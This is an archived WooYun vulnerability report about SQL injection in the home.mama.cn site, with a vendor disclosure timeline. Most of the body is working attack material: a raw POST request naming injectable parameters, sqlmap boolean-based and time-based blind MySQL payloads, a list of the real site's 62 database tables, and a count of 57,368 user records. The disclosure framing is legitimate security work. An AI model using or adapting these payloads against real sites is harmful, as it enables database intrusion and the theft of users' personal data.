乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-26: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经确认,细节仅向厂商公开 2015-06-05: 细节向核心白帽子及相关领域专家公开 2015-06-15: 细节向普通白帽子公开 2015-06-25: 细节向实习白帽子公开 2015-07-10: 细节向公众公开
233
POST /index.php?a=PublishPromotion&d=sub&g=Building HTTP/1.1Content-Length: 225Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: home.mama.cnCookie: ***********************8Host: home.mama.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*address=e&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077这几个参数都存在问题
---Parameter: address (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: address=e' RLIKE (SELECT (CASE WHEN (4469=4469) THEN 0x65 ELSE 0x28 END)) AND 'ZayY'='ZayY&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077 Type: AND/OR time-based blind Title: MySQL <= 5.0.11 OR time-based blind (heavy query) Payload: address=e' OR 9394=BENCHMARK(5000000,MD5(0x50706954)) AND 'yQSd'='yQSd&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077---web application technology: Nginx, PHP 5.3.27back-end DBMS: MySQL >= 5.0.0Database: home[62 tables]+------------------------------+| cj_column_pic || home_admin_user || home_art || home_art2 || home_art3 || home_art_20131025 || home_art_20131107 || home_art_pics || home_art_pics2 || home_art_pics3 || home_art_promotions || home_art_promotions1 || home_art_promotions_20131025 || home_art_promotions_20131030 || home_block_type || home_businessman || home_businessman_130802 || home_businessman_fee || home_businessman_log || home_businessman_mobile || home_businessman_type || home_casephoto || home_casephoto2 || home_casephoto_cj || home_channel || home_channel_art || home_channel_art_20131025 || home_collect || home_edit_block || home_edit_history || home_feedback || home_forum_thread || home_phone_message || home_phone_message_set || home_phone_pushtoken || home_phone_send || home_photopic || home_pic || home_pic2 || home_pic_130723 || home_pic_130725 || home_pic_cj || home_pic_cross_to_tc || home_region || home_send_block || home_send_item || home_send_item2 || home_sessions || home_short_message || home_short_message_feedback || home_short_message_log || home_sort || home_supermarket || home_supermarket_brand || home_tenders || home_tenders_company || home_tenders_jlog || home_tenders_log || home_tenders_materials || home_tenders_style || home_top_nav || home_user |+------------------------------+Database: home+-----------+---------+| Table | Entries |+-----------+---------+| home_user | 57368 |+-----------+---------+
check
危害等级:中
漏洞Rank:10
确认时间:2015-05-26 12:13
谢谢
暂无